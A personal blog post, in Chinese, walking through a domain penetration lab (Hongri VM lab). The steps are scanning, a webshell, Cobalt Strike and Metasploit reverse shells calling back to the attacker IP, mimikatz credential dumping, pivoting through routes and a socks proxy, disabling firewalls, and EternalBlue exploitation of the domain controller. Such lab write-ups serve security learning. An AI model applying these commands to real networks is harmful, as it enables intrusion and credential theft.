曾经 你说看星星看日落不如看我的眼眸……
环境配置
直接选择虚拟机打开即可,默认密码均为hongrisec@2019,开机后会提示改密码,修改一下。然后进入,会提示重启更新配置。重启一下。然后给三台虚拟机单独分配一个网络适配器(VMnet2),其中win7需要增加一个网络适配器2。如图
win7:内网IP:192.168.52.143 外网IP:192.168.88.137 (记得将phpstudy服务运行起来)
Kali(攻击IP):192.168.88.128
windows 2k3:192.168.52.141 域内成员机
Windows server 2008:192.168.52.138 域控服务器信息收集
内网收集信息,先扫描存活主机。
netdiscover -i eth0 -r 192.168.1/0/24
根据扫描结果发现域内主机有三个,192.168.52.143/138/141,这三台主机是无法访问的,其中还有一台192.168.88.137可以访问的,也就是与攻击机Kali在同一个IP段内。
端口扫描
使用Nmap来进行扫描
nmap -sC -v -n -sV -Pn -p 1-65535 192.168.88.137
看信息,开放端口:80&3306,且web服务是PHPstudy
访问查看,发现是phpstudy的探针,收集敏感信息
可以看出,网站目录C:/phpStudy/WWW/,探针地址等还有禁用函数。最后还有个连接MySQL数据库的操作,尝试弱口令,root:root&&root:123456发现用户密码均为root,连接成功
目录扫描
使用dirsearch来进行扫描
扫描没发现beifen.rar,由于现在这么写备份网站的已经很少了,所以常用字典中就给去掉了。实际上是有网站源码备份的。不过这里还扫出来了phpmyadmin网站
不知道是否可以登录。然后发现是可以登录的
漏洞利用
- 信息泄露
前台的公告,提示建站者修改密码,但是粗心的建站者不改,那么就可以使用这个默认用户名和密码来进行登录后台了。
尝试登录后台
CMS漏洞不再复现,现在直接getshell,并向内网延伸。
直接创建一句话木马。路径问题省略,自行寻找,直接连接getshell
这里将CS的客户端还有服务端均部署在kali中
创建监听并生成powershell command,在蚁剑中执行。
然后在客户端,肉鸡将上线CS。
内网与域渗透
内网信息收集
使用shell ipconfig可以看到内网IP为192.168.52.143
这里还是回到蚁剑操作比较方便
以及域(god.org)
其实使用不止CS这一种C2工具,其中metasploit也是一个极佳的选择
use exploit/multi/handler ///使用exploit/multi/handler进行探测
set payload Windows/meterpreter/reverse_tcp /// 设置payload 'Windows/meterpreter/reverse_tcp' 进行监听
set LHOST 192.168.88.128 ///设置下主机地址
run/exploit ///开始攻击下面是一些常见的域内信息收集使用的命令。
net group /domain #查看域内所有用户列表
net group "domain computers" /domain #查看域成员计算机列表
net group "domain admins" /domain #查看域管理员用户
whoami ///收集目标机器的身份
hostname /// 显示主机名称
net user ///显示用户
net localgroup administrator ///显示本地管理员组
主机密码收集
使用hashdump或者mimikatz来进行密码读取。
右键——>Access——>DumpHashes
右键——>Access——>Run Mimikatz自动执行命令
然后在Credentials(凭证栏)查看获取的密码
继续信息收集
这里先进行一下CS与MSF联动,从CS中将会话(session)传给msf
首先在msf中启动并监听自己的IP和端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_http(跟cs上选用的payload一样)
set lhost 本机ip
set lport 接受的端口
exploit 执行正在运行ing…..
在CS那边,创建一个foreign监听的listener
注意在MSF中选用的payload要与CS中相同,否则就会出现会话不合格的报错。上图中没修改,但是上面payload已经修改过了
然后右键选择一个会话,进行转发,右键——>spawn,选择foreign那个会话
然后回到msf,已经拿到了session了
小插曲过去,然后再回到信息收集中
- 查看补丁信息
run post/windows/gather/enum_patches
有点不理解,一直报错,原以为是进程的问题,尝试了换exe反弹shell,还有php/meterperter/reverse_tcp等方法,都是这样的结果。有点不理解。
- 这一步跳过了,下一步,看看安装了哪些软件
run post/windows/gather/enum_applications
看到有安装nmap,然后使用win7这台肉鸡对内网进行扫描。
- 查看路由信息,并添加路由到目标环境,使得msf可以通过win7来转发访问192.168.52.0的网段。
run get_local_subnets # 查看路由
run autoroute -s 192.168.52.0/24 # 添加路由
- 使用arp扫描52这个网段
run post/windows/gather/arp_scanner RHOSTS=192.168.52.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.52.141 PORTS=3389
- 使用win7的nmap对域内主机进行扫描
shell nmap --script=vuln 192.168.52.141
然后看下在win2008扫描的的漏洞信息
发现192.168.52.141存在漏洞:MS08-067、MS17-010,192.168.52.138存在MS17-010漏洞。
内网流量转发
msf成功反弹shell,并添加路由到目标环境网络。使得msf能够通过win7的路由转发访问192.168.52.0/24网段.
然后使用socks_proxy代理模块进行配置。
use auxiliary/server/socks_proxy
然后使用文本编辑器修改/etc/proxychains4.conf文件,最后一行添加配置
[ProxyList]
socks4 192.168.88.128 1080测试下,使用nmap扫描内网靶机
proxychains nmap -sT -sV -Pn -p22,80,443,445,135 --script=vuln 192.168.52.141
关于这个代理设置踩坑的,回头单独写一篇。这里不细说这个。
ms08-067获得shell
首先需要进行关闭防火墙(win7+win2008+2003)
netsh firewall set opmode disable # windows server 2003 之前
netsh advfirewall set allprofiles state off # windows server 2003 之后然后尝试攻击
这个看了很多师傅的复现过程,很多人这里都打不通。原因未知,可能是环境出问题了
ms07-010永恒之蓝getshell
在扫描过程中,发现的win2k3和2008都有445端口开放,都存在永恒之蓝漏洞,但是利用过程中,2003这台域内主机利用失败。
现在只能想到的原因是我的meterpreter是从CS中传递过来的,方式是http,但是在msf中我使用了tcp的payload进行攻击,现在考虑整个过程只能想到是这个原因了。然后我换了一种方式,对2008进行攻击
使用的模块以及payload如下
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
但是这个攻击成功了,有点不理解了【计算机玄学】——到这里拿下了域控服务器。但是win2003还没拿到权限。
SMB远程桌面口令猜测
发现好像是2003的这台机器出问题了啊。因为漏洞在这台机器上的都不能成功利用。反而在2008机器上可以利用。
Oracle数据库TNS服务漏洞
调用模块use auxiliary/admin/oracle/sid_brute
未完待续….
内网横向待学习……
- 本文链接:https://m0re.top/posts/564d8432/
- 版权声明:本博客所有文章除特别声明外,均默认采用 许可协议。
您可以点击下方按钮切换对应评论系统,
Valineutterances